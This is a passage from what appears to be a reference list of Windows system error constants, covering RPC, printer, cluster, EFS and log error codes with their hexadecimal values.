RPC_S_NO_CALL_ACTIVE = 0x06BD - RPC_S_CALL_FAILED = 0x06BE - RPC_S_CALL_FAILED_DNE = 0x06BF - RPC_S_PROTOCOL_ERROR = 0x06C0 - RPC_S_PROXY_ACCESS_DENIED = 0x06C1 - RPC_S_UNSUPPORTED_TRANS_SYN = 0x06C2 - RPC_S_UNSUPPORTED_TYPE = 0x06C4 - RPC_S_INVALID_TAG = 0x06C5 - RPC_S_INVALID_BOUND = 0x06C6 - RPC_S_NO_ENTRY_NAME = 0x06C7 - RPC_S_INVALID_NAME_SYNTAX = 0x06C8 - RPC_S_UNSUPPORTED_NAME_SYNTAX = 0x06C9 - RPC_S_UUID_NO_ADDRESS = 0x06CB - RPC_S_DUPLICATE_ENDPOINT = 0x06CC - RPC_S_UNKNOWN_AUTHN_TYPE = 0x06CD - RPC_S_MAX_CALLS_TOO_SMALL = 0x06CE - RPC_S_STRING_TOO_LONG = 0x06CF - RPC_S_PROTSEQ_NOT_FOUND = 0x06D0 - RPC_S_PROCNUM_OUT_OF_RANGE = 0x06D1 - RPC_S_BINDING_HAS_NO_AUTH = 0x06D2 - RPC_S_UNKNOWN_AUTHN_SERVICE = 0x06D3 - RPC_S_UNKNOWN_AUTHN_LEVEL = 0x06D4 - RPC_S_INVALID_AUTH_IDENTITY = 0x06D5 - RPC_S_UNKNOWN_AUTHZ_SERVICE = 0x06D6 - EPT_S_INVALID_ENTRY = 0x06D7 - EPT_S_CANT_PERFORM_OP = 0x06D8 - EPT_S_NOT_REGISTERED = 0x06D9 - RPC_S_NOTHING_TO_EXPORT = 0x06DA - RPC_S_INCOMPLETE_NAME = 0x06DB - RPC_S_INVALID_VERS_OPTION = 0x06DC - RPC_S_NO_MORE_MEMBERS = 0x06DD - RPC_S_NOT_ALL_OBJS_UNEXPORTED = 0x06DE - RPC_S_INTERFACE_NOT_FOUND = 0x06DF - RPC_S_ENTRY_ALREADY_EXISTS = 0x06E0 - RPC_S_ENTRY_NOT_FOUND = 0x06E1 - RPC_S_NAME_SERVICE_UNAVAILABLE = 0x06E2 - RPC_S_INVALID_NAF_ID = 0x06E3 - RPC_S_CANNOT_SUPPORT = 0x06E4 - RPC_S_NO_CONTEXT_AVAILABLE = 0x06E5 - RPC_S_INTERNAL_ERROR = 0x06E6 - RPC_S_ZERO_DIVIDE = 0x06E7 - RPC_S_ADDRESS_ERROR = 0x06E8 - RPC_S_FP_DIV_ZERO = 0x06E9 - RPC_S_FP_UNDERFLOW = 0x06EA - RPC_S_FP_OVERFLOW = 0x06EB - RPC_X_NO_MORE_ENTRIES = 0x06EC - RPC_X_SS_CHAR_TRANS_OPEN_FAIL = 0x06ED - RPC_X_SS_CHAR_TRANS_SHORT_FILE = 0x06EE - RPC_X_SS_IN_NULL_CONTEXT = 0x06EF - RPC_X_SS_CONTEXT_DAMAGED = 0x06F1 - RPC_X_SS_HANDLES_MISMATCH = 0x06F2 - RPC_X_SS_CANNOT_GET_CALL_HANDLE = 0x06F3 - RPC_X_NULL_REF_POINTER = 0x06F4 - RPC_X_ENUM_VALUE_OUT_OF_RANGE = 0x06F5 - RPC_X_BYTE_COUNT_TOO_SMALL = 0x06F6 - RPC_X_BAD_STUB_DATA = 0x06F7 - ERROR_INVALID_USER_BUFFER = 0x06F8 - ERROR_UNRECOGNIZED_MEDIA = 0x06F9 - ERROR_NO_TRUST_LSA_SECRET = 0x06FA - ERROR_NO_TRUST_SAM_ACCOUNT = 0x06FB - ERROR_TRUSTED_DOMAIN_FAILURE = 0x06FC - ERROR_TRUSTED_RELATIONSHIP_FAILURE = 0x06FD - ERROR_TRUST_FAILURE = 0x06FE - RPC_S_CALL_IN_PROGRESS = 0x06FF - ERROR_NETLOGON_NOT_STARTED = 0x0700 - ERROR_ACCOUNT_EXPIRED = 0x0701 - ERROR_REDIRECTOR_HAS_OPEN_HANDLES = 0x0702 - ERROR_PRINTER_DRIVER_ALREADY_INSTALLED = 0x0703 - ERROR_UNKNOWN_PORT = 0x0704 - ERROR_UNKNOWN_PRINTER_DRIVER = 0x0705 - ERROR_UNKNOWN_PRINTPROCESSOR = 0x0706 - ERROR_INVALID_SEPARATOR_FILE = 0x0707 - ERROR_INVALID_PRIORITY = 0x0708 - ERROR_INVALID_PRINTER_NAME = 0x0709 - ERROR_PRINTER_ALREADY_EXISTS = 0x070A - ERROR_INVALID_PRINTER_COMMAND = 0x070B - ERROR_INVALID_DATATYPE = 0x070C - ERROR_INVALID_ENVIRONMENT = 0x070D - RPC_S_NO_MORE_BINDINGS = 0x070E - ERROR_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT = 0x070F - ERROR_NOLOGON_WORKSTATION_TRUST_ACCOUNT = 0x0710 - ERROR_NOLOGON_SERVER_TRUST_ACCOUNT = 0x0711 - ERROR_DOMAIN_TRUST_INCONSISTENT = 0x0712 - ERROR_SERVER_HAS_OPEN_HANDLES = 0x0713 - ERROR_RESOURCE_DATA_NOT_FOUND = 0x0714 - ERROR_RESOURCE_TYPE_NOT_FOUND = 0x0715 - ERROR_RESOURCE_NAME_NOT_FOUND = 0x0716 - ERROR_RESOURCE_LANG_NOT_FOUND = 0x0717 - ERROR_NOT_ENOUGH_QUOTA = 0x0718 - RPC_S_NO_INTERFACES = 0x0719 - RPC_S_CALL_CANCELLED = 0x071A - RPC_S_BINDING_INCOMPLETE = 0x071B - RPC_S_COMM_FAILURE = 0x071C - RPC_S_UNSUPPORTED_AUTHN_LEVEL = 0x071D - RPC_S_NO_PRINC_NAME = 0x071E - RPC_S_NOT_RPC_ERROR = 0x071F - RPC_S_UUID_LOCAL_ONLY = 0x0720 - RPC_S_SEC_PKG_ERROR = 0x0721 - RPC_S_NOT_CANCELLED = 0x0722 - RPC_X_INVALID_ES_ACTION = 0x0723 - RPC_X_WRONG_ES_VERSION = 0x0724 - RPC_X_WRONG_STUB_VERSION = 0x0725 - RPC_X_INVALID_PIPE_OBJECT = 0x0726 - RPC_X_WRONG_PIPE_ORDER = 0x0727 - RPC_X_WRONG_PIPE_VERSION = 0x0728 - RPC_S_COOKIE_AUTH_FAILED = 0x0729 - RPC_S_GROUP_MEMBER_NOT_FOUND = 0x076A - EPT_S_CANT_CREATE = 0x076B - RPC_S_INVALID_OBJECT = 0x076C - ERROR_INVALID_TIME = 0x076D - ERROR_INVALID_FORM_NAME = 0x076E - ERROR_INVALID_FORM_SIZE = 0x076F - ERROR_ALREADY_WAITING = 0x0770 - ERROR_PRINTER_DELETED = 0x0771 - ERROR_INVALID_PRINTER_STATE = 0x0772 - ERROR_PASSWORD_MUST_CHANGE = 0x0773 - ERROR_DOMAIN_CONTROLLER_NOT_FOUND = 0x0774 - ERROR_ACCOUNT_LOCKED_OUT = 0x0775 - OR_INVALID_OXID = 0x0776 - OR_INVALID_OID = 0x0777 - OR_INVALID_SET = 0x0778 - RPC_S_SEND_INCOMPLETE = 0x0779 - RPC_S_INVALID_ASYNC_HANDLE = 0x077A - RPC_S_INVALID_ASYNC_CALL = 0x077B - RPC_X_PIPE_CLOSED = 0x077C - RPC_X_PIPE_DISCIPLINE_ERROR = 0x077D - RPC_X_PIPE_EMPTY = 0x077E - ERROR_NO_SITENAME = 0x077F - ERROR_CANT_ACCESS_FILE = 0x0780 - ERROR_CANT_RESOLVE_FILENAME = 0x0781 - RPC_S_ENTRY_TYPE_MISMATCH = 0x0782 - RPC_S_NOT_ALL_OBJS_EXPORTED = 0x0783 - RPC_S_INTERFACE_NOT_EXPORTED = 0x0784 - RPC_S_PROFILE_NOT_ADDED = 0x0785 - RPC_S_PRF_ELT_NOT_ADDED = 0x0786 - RPC_S_PRF_ELT_NOT_REMOVED = 0x0787 - RPC_S_GRP_ELT_NOT_ADDED = 0x0788 - RPC_S_GRP_ELT_NOT_REMOVED = 0x0789 - ERROR_KM_DRIVER_BLOCKED = 0x078A - ERROR_CONTEXT_EXPIRED = 0x078B - ERROR_PER_USER_TRUST_QUOTA_EXCEEDED = 0x078C - ERROR_ALL_USER_TRUST_QUOTA_EXCEEDED = 0x078D - ERROR_USER_DELETE_TRUST_QUOTA_EXCEEDED = 0x078E - ERROR_AUTHENTICATION_FIREWALL_FAILED = 0x078F - ERROR_REMOTE_PRINT_CONNECTIONS_BLOCKED = 0x0790 - ERROR_NTLM_BLOCKED = 0x0791 - ERROR_INVALID_PIXEL_FORMAT = 0x07D0 - ERROR_BAD_DRIVER = 0x07D1 - ERROR_INVALID_WINDOW_STYLE = 0x07D2 - ERROR_METAFILE_NOT_SUPPORTED = 0x07D3 - ERROR_TRANSFORM_NOT_SUPPORTED = 0x07D4 - ERROR_CLIPPING_NOT_SUPPORTED = 0x07D5 - ERROR_INVALID_CMM = 0x07DA - ERROR_INVALID_PROFILE = 0x07DB - ERROR_TAG_NOT_FOUND = 0x07DC - ERROR_TAG_NOT_PRESENT = 0x07DD - ERROR_DUPLICATE_TAG = 0x07DE - ERROR_PROFILE_NOT_ASSOCIATED_WITH_DEVICE = 0x07DF - ERROR_PROFILE_NOT_FOUND = 0x07E0 - ERROR_INVALID_COLORSPACE = 0x07E1 - ERROR_ICM_NOT_ENABLED = 0x07E2 - ERROR_DELETING_ICM_XFORM = 0x07E3 - ERROR_INVALID_TRANSFORM = 0x07E4 - ERROR_COLORSPACE_MISMATCH = 0x07E5 - ERROR_INVALID_COLORINDEX = 0x07E6 - ERROR_PROFILE_DOES_NOT_MATCH_DEVICE = 0x07E7 - ERROR_CONNECTED_OTHER_PASSWORD = 0x083C - ERROR_CONNECTED_OTHER_PASSWORD_DEFAULT = 0x083D - ERROR_BAD_USERNAME = 0x089A - ERROR_NOT_CONNECTED = 0x08CA - ERROR_OPEN_FILES = 0x0961 - ERROR_ACTIVE_CONNECTIONS = 0x0962 - ERROR_DEVICE_IN_USE = 0x0964 - ERROR_UNKNOWN_PRINT_MONITOR = 0x0BB8 - ERROR_PRINTER_DRIVER_IN_USE = 0x0BB9 - ERROR_SPOOL_FILE_NOT_FOUND = 0x0BBA - ERROR_SPL_NO_STARTDOC = 0x0BBB - ERROR_SPL_NO_ADDJOB = 0x0BBC - ERROR_PRINT_PROCESSOR_ALREADY_INSTALLED = 0x0BBD - ERROR_PRINT_MONITOR_ALREADY_INSTALLED = 0x0BBE - ERROR_INVALID_PRINT_MONITOR = 0x0BBF - ERROR_PRINT_MONITOR_IN_USE = 0x0BC0 - ERROR_PRINTER_HAS_JOBS_QUEUED = 0x0BC1 - ERROR_SUCCESS_REBOOT_REQUIRED = 0x0BC2 - ERROR_SUCCESS_RESTART_REQUIRED = 0x0BC3 - ERROR_PRINTER_NOT_FOUND = 0x0BC4 - ERROR_PRINTER_DRIVER_WARNED = 0x0BC5 - ERROR_PRINTER_DRIVER_BLOCKED = 0x0BC6 - ERROR_PRINTER_DRIVER_PACKAGE_IN_USE = 0x0BC7 - ERROR_CORE_DRIVER_PACKAGE_NOT_FOUND = 0x0BC8 - ERROR_FAIL_REBOOT_REQUIRED = 0x0BC9 - ERROR_FAIL_REBOOT_INITIATED = 0x0BCA - ERROR_PRINTER_DRIVER_DOWNLOAD_NEEDED = 0x0BCB - ERROR_PRINT_JOB_RESTART_REQUIRED = 0x0BCC - ERROR_IO_REISSUE_AS_CACHED = 0x0F6E - ERROR_WINS_INTERNAL = 0x0FA0 - ERROR_CAN_NOT_DEL_LOCAL_WINS = 0x0FA1 - ERROR_STATIC_INIT = 0x0FA2 - ERROR_INC_BACKUP = 0x0FA3 - ERROR_FULL_BACKUP = 0x0FA4 - ERROR_REC_NON_EXISTENT = 0x0FA5 - ERROR_RPL_NOT_ALLOWED = 0x0FA6 - PEERDIST_ERROR_CONTENTINFO_VERSION_UNSUPPORTED = 0x0FD2 - PEERDIST_ERROR_CANNOT_PARSE_CONTENTINFO = 0x0FD3 - PEERDIST_ERROR_MISSING_DATA = 0x0FD4 - PEERDIST_ERROR_NO_MORE = 0x0FD5 - PEERDIST_ERROR_NOT_INITIALIZED = 0x0FD6 - PEERDIST_ERROR_ALREADY_INITIALIZED = 0x0FD7 - PEERDIST_ERROR_SHUTDOWN_IN_PROGRESS = 0x0FD8 - PEERDIST_ERROR_INVALIDATED = 0x0FD9 - PEERDIST_ERROR_ALREADY_EXISTS = 0x0FDA - PEERDIST_ERROR_OPERATION_NOTFOUND = 0x0FDB - PEERDIST_ERROR_ALREADY_COMPLETED = 0x0FDC - PEERDIST_ERROR_OUT_OF_BOUNDS = 0x0FDD - PEERDIST_ERROR_VERSION_UNSUPPORTED = 0x0FDE - PEERDIST_ERROR_INVALID_CONFIGURATION = 0x0FDF - PEERDIST_ERROR_NOT_LICENSED = 0x0FE0 - PEERDIST_ERROR_SERVICE_UNAVAILABLE = 0x0FE1 - ERROR_DHCP_ADDRESS_CONFLICT = 0x1004 - ERROR_WMI_GUID_NOT_FOUND = 0x1068 - ERROR_WMI_INSTANCE_NOT_FOUND = 0x1069 - ERROR_WMI_ITEMID_NOT_FOUND = 0x106A - ERROR_WMI_TRY_AGAIN = 0x106B - ERROR_WMI_DP_NOT_FOUND = 0x106C - ERROR_WMI_UNRESOLVED_INSTANCE_REF = 0x106D - ERROR_WMI_ALREADY_ENABLED = 0x106E - ERROR_WMI_GUID_DISCONNECTED = 0x106F - ERROR_WMI_SERVER_UNAVAILABLE = 0x1070 - ERROR_WMI_DP_FAILED = 0x1071 - ERROR_WMI_INVALID_MOF = 0x1072 - ERROR_WMI_INVALID_REGINFO = 0x1073 - ERROR_WMI_ALREADY_DISABLED = 0x1074 - ERROR_WMI_READ_ONLY = 0x1075 - ERROR_WMI_SET_FAILURE = 0x1076 - ERROR_INVALID_MEDIA = 0x10CC - ERROR_INVALID_LIBRARY = 0x10CD - ERROR_INVALID_MEDIA_POOL = 0x10CE - ERROR_DRIVE_MEDIA_MISMATCH = 0x10CF - ERROR_MEDIA_OFFLINE = 0x10D0 - ERROR_LIBRARY_OFFLINE = 0x10D1 - ERROR_EMPTY = 0x10D2 - ERROR_NOT_EMPTY = 0x10D3 - ERROR_MEDIA_UNAVAILABLE = 0x10D4 - ERROR_RESOURCE_DISABLED = 0x10D5 - ERROR_INVALID_CLEANER = 0x10D6 - ERROR_UNABLE_TO_CLEAN = 0x10D7 - ERROR_OBJECT_NOT_FOUND = 0x10D8 - ERROR_DATABASE_FAILURE = 0x10D9 - ERROR_DATABASE_FULL = 0x10DA - ERROR_MEDIA_INCOMPATIBLE = 0x10DB - ERROR_RESOURCE_NOT_PRESENT = 0x10DC - ERROR_INVALID_OPERATION = 0x10DD - ERROR_MEDIA_NOT_AVAILABLE = 0x10DE - ERROR_DEVICE_NOT_AVAILABLE = 0x10DF - ERROR_REQUEST_REFUSED = 0x10E0 - ERROR_INVALID_DRIVE_OBJECT = 0x10E1 - ERROR_LIBRARY_FULL = 0x10E2 - ERROR_MEDIUM_NOT_ACCESSIBLE = 0x10E3 - ERROR_UNABLE_TO_LOAD_MEDIUM = 0x10E4 - ERROR_UNABLE_TO_INVENTORY_DRIVE = 0x10E5 - ERROR_UNABLE_TO_INVENTORY_SLOT = 0x10E6 - ERROR_UNABLE_TO_INVENTORY_TRANSPORT = 0x10E7 - ERROR_TRANSPORT_FULL = 0x10E8 - ERROR_CONTROLLING_IEPORT = 0x10E9 - ERROR_UNABLE_TO_EJECT_MOUNTED_MEDIA = 0x10EA - ERROR_CLEANER_SLOT_SET = 0x10EB - ERROR_CLEANER_SLOT_NOT_SET = 0x10EC - ERROR_CLEANER_CARTRIDGE_SPENT = 0x10ED - ERROR_UNEXPECTED_OMID = 0x10EE - ERROR_CANT_DELETE_LAST_ITEM = 0x10EF - ERROR_MESSAGE_EXCEEDS_MAX_SIZE = 0x10F0 - ERROR_VOLUME_CONTAINS_SYS_FILES = 0x10F1 - ERROR_INDIGENOUS_TYPE = 0x10F2 - ERROR_NO_SUPPORTING_DRIVES = 0x10F3 - ERROR_CLEANER_CARTRIDGE_INSTALLED = 0x10F4 - ERROR_IEPORT_FULL = 0x10F5 - ERROR_FILE_OFFLINE = 0x10FE - ERROR_REMOTE_STORAGE_NOT_ACTIVE = 0x10FF - ERROR_REMOTE_STORAGE_MEDIA_ERROR = 0x1100 - ERROR_NOT_A_REPARSE_POINT = 0x1126 - ERROR_REPARSE_ATTRIBUTE_CONFLICT = 0x1127 - ERROR_INVALID_REPARSE_DATA = 0x1128 - ERROR_REPARSE_TAG_INVALID = 0x1129 - ERROR_REPARSE_TAG_MISMATCH = 0x112A - ERROR_VOLUME_NOT_SIS_ENABLED = 0x1194 - ERROR_DEPENDENT_RESOURCE_EXISTS = 0x1389 - ERROR_DEPENDENCY_NOT_FOUND = 0x138A - ERROR_DEPENDENCY_ALREADY_EXISTS = 0x138B - ERROR_RESOURCE_NOT_ONLINE = 0x138C - ERROR_HOST_NODE_NOT_AVAILABLE = 0x138D - ERROR_RESOURCE_NOT_AVAILABLE = 0x138E - ERROR_RESOURCE_NOT_FOUND = 0x138F - ERROR_SHUTDOWN_CLUSTER = 0x1390 - ERROR_CANT_EVICT_ACTIVE_NODE = 0x1391 - ERROR_OBJECT_ALREADY_EXISTS = 0x1392 - ERROR_OBJECT_IN_LIST = 0x1393 - ERROR_GROUP_NOT_AVAILABLE = 0x1394 - ERROR_GROUP_NOT_FOUND = 0x1395 - ERROR_GROUP_NOT_ONLINE = 0x1396 - ERROR_HOST_NODE_NOT_RESOURCE_OWNER = 0x1397 - ERROR_HOST_NODE_NOT_GROUP_OWNER = 0x1398 - ERROR_RESMON_CREATE_FAILED = 0x1399 - ERROR_RESMON_ONLINE_FAILED = 0x139A - ERROR_RESOURCE_ONLINE = 0x139B - ERROR_QUORUM_RESOURCE = 0x139C - ERROR_NOT_QUORUM_CAPABLE = 0x139D - ERROR_CLUSTER_SHUTTING_DOWN = 0x139E - ERROR_INVALID_STATE = 0x139F - ERROR_RESOURCE_PROPERTIES_STORED = 0x13A0 - ERROR_NOT_QUORUM_CLASS = 0x13A1 - ERROR_CORE_RESOURCE = 0x13A2 - ERROR_QUORUM_RESOURCE_ONLINE_FAILED = 0x13A3 - ERROR_QUORUMLOG_OPEN_FAILED = 0x13A4 - ERROR_CLUSTERLOG_CORRUPT = 0x13A5 - ERROR_CLUSTERLOG_RECORD_EXCEEDS_MAXSIZE = 0x13A6 - ERROR_CLUSTERLOG_EXCEEDS_MAXSIZE = 0x13A7 - ERROR_CLUSTERLOG_CHKPOINT_NOT_FOUND = 0x13A8 - ERROR_CLUSTERLOG_NOT_ENOUGH_SPACE = 0x13A9 - ERROR_QUORUM_OWNER_ALIVE = 0x13AA - ERROR_NETWORK_NOT_AVAILABLE = 0x13AB - ERROR_NODE_NOT_AVAILABLE = 0x13AC - ERROR_ALL_NODES_NOT_AVAILABLE = 0x13AD - ERROR_RESOURCE_FAILED = 0x13AE - ERROR_CLUSTER_INVALID_NODE = 0x13AF - ERROR_CLUSTER_NODE_EXISTS = 0x13B0 - ERROR_CLUSTER_JOIN_IN_PROGRESS = 0x13B1 - ERROR_CLUSTER_NODE_NOT_FOUND = 0x13B2 - ERROR_CLUSTER_LOCAL_NODE_NOT_FOUND = 0x13B3 - ERROR_CLUSTER_NETWORK_EXISTS = 0x13B4 - ERROR_CLUSTER_NETWORK_NOT_FOUND = 0x13B5 - ERROR_CLUSTER_NETINTERFACE_EXISTS = 0x13B6 - ERROR_CLUSTER_NETINTERFACE_NOT_FOUND = 0x13B7 - ERROR_CLUSTER_INVALID_REQUEST = 0x13B8 - ERROR_CLUSTER_INVALID_NETWORK_PROVIDER = 0x13B9 - ERROR_CLUSTER_NODE_DOWN = 0x13BA - ERROR_CLUSTER_NODE_UNREACHABLE = 0x13BB - ERROR_CLUSTER_NODE_NOT_MEMBER = 0x13BC - ERROR_CLUSTER_JOIN_NOT_IN_PROGRESS = 0x13BD - ERROR_CLUSTER_INVALID_NETWORK = 0x13BE - ERROR_CLUSTER_NODE_UP = 0x13C0 - ERROR_CLUSTER_IPADDR_IN_USE = 0x13C1 - ERROR_CLUSTER_NODE_NOT_PAUSED = 0x13C2 - ERROR_CLUSTER_NO_SECURITY_CONTEXT = 0x13C3 - ERROR_CLUSTER_NETWORK_NOT_INTERNAL = 0x13C4 - ERROR_CLUSTER_NODE_ALREADY_UP = 0x13C5 - ERROR_CLUSTER_NODE_ALREADY_DOWN = 0x13C6 - ERROR_CLUSTER_NETWORK_ALREADY_ONLINE = 0x13C7 - ERROR_CLUSTER_NETWORK_ALREADY_OFFLINE = 0x13C8 - ERROR_CLUSTER_NODE_ALREADY_MEMBER = 0x13C9 - ERROR_CLUSTER_LAST_INTERNAL_NETWORK = 0x13CA - ERROR_CLUSTER_NETWORK_HAS_DEPENDENTS = 0x13CB - ERROR_INVALID_OPERATION_ON_QUORUM = 0x13CC - ERROR_DEPENDENCY_NOT_ALLOWED = 0x13CD - ERROR_CLUSTER_NODE_PAUSED = 0x13CE - ERROR_NODE_CANT_HOST_RESOURCE = 0x13CF - ERROR_CLUSTER_NODE_NOT_READY = 0x13D0 - ERROR_CLUSTER_NODE_SHUTTING_DOWN = 0x13D1 - ERROR_CLUSTER_JOIN_ABORTED = 0x13D2 - ERROR_CLUSTER_INCOMPATIBLE_VERSIONS = 0x13D3 - ERROR_CLUSTER_MAXNUM_OF_RESOURCES_EXCEEDED = 0x13D4 - ERROR_CLUSTER_SYSTEM_CONFIG_CHANGED = 0x13D5 - ERROR_CLUSTER_RESOURCE_TYPE_NOT_FOUND = 0x13D6 - ERROR_CLUSTER_RESTYPE_NOT_SUPPORTED = 0x13D7 - ERROR_CLUSTER_RESNAME_NOT_FOUND = 0x13D8 - ERROR_CLUSTER_NO_RPC_PACKAGES_REGISTERED = 0x13D9 - ERROR_CLUSTER_OWNER_NOT_IN_PREFLIST = 0x13DA - ERROR_CLUSTER_DATABASE_SEQMISMATCH = 0x13DB - ERROR_RESMON_INVALID_STATE = 0x13DC - ERROR_CLUSTER_GUM_NOT_LOCKER = 0x13DD - ERROR_QUORUM_DISK_NOT_FOUND = 0x13DE - ERROR_DATABASE_BACKUP_CORRUPT = 0x13DF - ERROR_CLUSTER_NODE_ALREADY_HAS_DFS_ROOT = 0x13E0 - ERROR_RESOURCE_PROPERTY_UNCHANGEABLE = 0x13E1 - ERROR_CLUSTER_MEMBERSHIP_INVALID_STATE = 0x1702 - ERROR_CLUSTER_QUORUMLOG_NOT_FOUND = 0x1703 - ERROR_CLUSTER_MEMBERSHIP_HALT = 0x1704 - ERROR_CLUSTER_INSTANCE_ID_MISMATCH = 0x1705 - ERROR_CLUSTER_NETWORK_NOT_FOUND_FOR_IP = 0x1706 - ERROR_CLUSTER_PROPERTY_DATA_TYPE_MISMATCH = 0x1707 - ERROR_CLUSTER_EVICT_WITHOUT_CLEANUP = 0x1708 - ERROR_CLUSTER_PARAMETER_MISMATCH = 0x1709 - ERROR_NODE_CANNOT_BE_CLUSTERED = 0x170A - ERROR_CLUSTER_WRONG_OS_VERSION = 0x170B - ERROR_CLUSTER_CANT_CREATE_DUP_CLUSTER_NAME = 0x170C - ERROR_CLUSCFG_ALREADY_COMMITTED = 0x170D - ERROR_CLUSCFG_ROLLBACK_FAILED = 0x170E - ERROR_CLUSCFG_SYSTEM_DISK_DRIVE_LETTER_CONFLICT = 0x170F - ERROR_CLUSTER_OLD_VERSION = 0x1710 - ERROR_CLUSTER_MISMATCHED_COMPUTER_ACCT_NAME = 0x1711 - ERROR_CLUSTER_NO_NET_ADAPTERS = 0x1712 - ERROR_CLUSTER_POISONED = 0x1713 - ERROR_CLUSTER_GROUP_MOVING = 0x1714 - ERROR_CLUSTER_RESOURCE_TYPE_BUSY = 0x1715 - ERROR_RESOURCE_CALL_TIMED_OUT = 0x1716 - ERROR_INVALID_CLUSTER_IPV6_ADDRESS = 0x1717 - ERROR_CLUSTER_INTERNAL_INVALID_FUNCTION = 0x1718 - ERROR_CLUSTER_PARAMETER_OUT_OF_BOUNDS = 0x1719 - ERROR_CLUSTER_PARTIAL_SEND = 0x171A - ERROR_CLUSTER_REGISTRY_INVALID_FUNCTION = 0x171B - ERROR_CLUSTER_INVALID_STRING_TERMINATION = 0x171C - ERROR_CLUSTER_INVALID_STRING_FORMAT = 0x171D - ERROR_CLUSTER_DATABASE_TRANSACTION_IN_PROGRESS = 0x171E - ERROR_CLUSTER_DATABASE_TRANSACTION_NOT_IN_PROGRESS = 0x171F - ERROR_CLUSTER_NULL_DATA = 0x1720 - ERROR_CLUSTER_PARTIAL_READ = 0x1721 - ERROR_CLUSTER_PARTIAL_WRITE = 0x1722 - ERROR_CLUSTER_CANT_DESERIALIZE_DATA = 0x1723 - ERROR_DEPENDENT_RESOURCE_PROPERTY_CONFLICT = 0x1724 - ERROR_CLUSTER_NO_QUORUM = 0x1725 - ERROR_CLUSTER_INVALID_IPV6_NETWORK = 0x1726 - ERROR_CLUSTER_INVALID_IPV6_TUNNEL_NETWORK = 0x1727 - ERROR_QUORUM_NOT_ALLOWED_IN_THIS_GROUP = 0x1728 - ERROR_DEPENDENCY_TREE_TOO_COMPLEX = 0x1729 - ERROR_EXCEPTION_IN_RESOURCE_CALL = 0x172A - ERROR_CLUSTER_RHS_FAILED_INITIALIZATION = 0x172B - ERROR_CLUSTER_NOT_INSTALLED = 0x172C - ERROR_CLUSTER_RESOURCES_MUST_BE_ONLINE_ON_THE_SAME_NODE = 0x172D - ERROR_CLUSTER_MAX_NODES_IN_CLUSTER = 0x172E - ERROR_CLUSTER_TOO_MANY_NODES = 0x172F - ERROR_CLUSTER_OBJECT_ALREADY_USED = 0x1730 - ERROR_NONCORE_GROUPS_FOUND = 0x1731 - ERROR_FILE_SHARE_RESOURCE_CONFLICT = 0x1732 - ERROR_CLUSTER_EVICT_INVALID_REQUEST = 0x1733 - ERROR_CLUSTER_SINGLETON_RESOURCE = 0x1734 - ERROR_CLUSTER_GROUP_SINGLETON_RESOURCE = 0x1735 - ERROR_CLUSTER_RESOURCE_PROVIDER_FAILED = 0x1736 - ERROR_CLUSTER_RESOURCE_CONFIGURATION_ERROR = 0x1737 - ERROR_CLUSTER_GROUP_BUSY = 0x1738 - ERROR_CLUSTER_NOT_SHARED_VOLUME = 0x1739 - ERROR_CLUSTER_INVALID_SECURITY_DESCRIPTOR = 0x173A - ERROR_CLUSTER_SHARED_VOLUMES_IN_USE = 0x173B - ERROR_CLUSTER_USE_SHARED_VOLUMES_API = 0x173C - ERROR_CLUSTER_BACKUP_IN_PROGRESS = 0x173D - ERROR_NON_CSV_PATH = 0x173E - ERROR_CSV_VOLUME_NOT_LOCAL = 0x173F - ERROR_CLUSTER_WATCHDOG_TERMINATING = 0x1740 - ERROR_ENCRYPTION_FAILED = 0x1770 - ERROR_DECRYPTION_FAILED = 0x1771 - ERROR_FILE_ENCRYPTED = 0x1772 - ERROR_NO_RECOVERY_POLICY = 0x1773 - ERROR_NO_EFS = 0x1774 - ERROR_WRONG_EFS = 0x1775 - ERROR_NO_USER_KEYS = 0x1776 - ERROR_FILE_NOT_ENCRYPTED = 0x1777 - ERROR_NOT_EXPORT_FORMAT = 0x1778 - ERROR_FILE_READ_ONLY = 0x1779 - ERROR_DIR_EFS_DISALLOWED = 0x177A - ERROR_EFS_SERVER_NOT_TRUSTED = 0x177B - ERROR_BAD_RECOVERY_POLICY = 0x177C - ERROR_EFS_ALG_BLOB_TOO_BIG = 0x177D - ERROR_VOLUME_NOT_SUPPORT_EFS = 0x177E - ERROR_EFS_DISABLED = 0x177F - ERROR_EFS_VERSION_NOT_SUPPORT = 0x1780 - ERROR_CS_ENCRYPTION_INVALID_SERVER_RESPONSE = 0x1781 - ERROR_CS_ENCRYPTION_UNSUPPORTED_SERVER = 0x1782 - ERROR_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE = 0x1783 - ERROR_CS_ENCRYPTION_NEW_ENCRYPTED_FILE = 0x1784 - ERROR_CS_ENCRYPTION_FILE_NOT_CSE = 0x1785 - ERROR_NO_BROWSER_SERVERS_FOUND = 0x17E6 - SCHED_E_SERVICE_NOT_LOCALSYSTEM = 0x1838 - ERROR_LOG_SECTOR_INVALID = 0x19C8 - ERROR_LOG_SECTOR_PARITY_INVALID = 0x19C9 - ERROR_LOG_SECTOR_REMAPPED = 0x19CA - ERROR_LOG_BLOCK_INCOMPLETE = 0x19CB - ERROR_LOG_INVALID_RANGE = 0x19CC - ERROR_LOG_BLOCKS_EXHAUSTED = 0x19CD - ERROR_LOG_READ_CONTEXT_INVALID = 0x19CE - ERROR_LOG_RESTART_INVALID = 0x19CF - ERROR_LOG_BLOCK_VERSION = 0x19D0 - ERROR_LOG_BLOCK_INVALID = 0x19D1 - ERROR_LOG_READ_MODE_INVALID = 0x19D2 - ERROR_LOG_NO_RESTART = 0x19D3 - ERROR_LOG_METADATA_CORRUPT = 0x19D4 - ERROR_LOG_METADATA_INVALID = 0x19D5 - ERROR_LOG_METADATA_INCONSISTENT = 0x19D6 - ERROR_LOG_RESERVATION_INVALID = 0x19D7 - ERROR_LOG_CANT_DELETE = 0x19D8 - ERROR_LOG_CONTAINER_LIMIT_EXCEEDED = 0x19D9 - ERROR_LOG_START_OF_LOG = 0x19DA - ERROR_LOG_POLICY_ALREADY_INSTALLED = 0x19DB - ERROR_LOG_POLICY_NOT_INSTALLED = 0x19DC - ERROR_LOG_POLICY_INVALID = 0x19DD - ERROR_LOG_POLICY_CONFLICT = 0x19DE - ERROR_LOG_PINNED_ARCHIVE_TAIL = 0x19DF - ERROR_LOG_RECORD_NONEXISTENT = 0x19E0 - ERROR_LOG_RECORDS_RESERVED_INVALID = 0x19E1 - ERROR_LOG_SPACE_RESERVED_INVALID = 0x19E2 - ERROR_LOG_TAIL_INVALID = 0x19E3 - ERROR_LOG_FULL = 0x19E4 - ERROR_COULD_NOT_RESIZE_LOG = 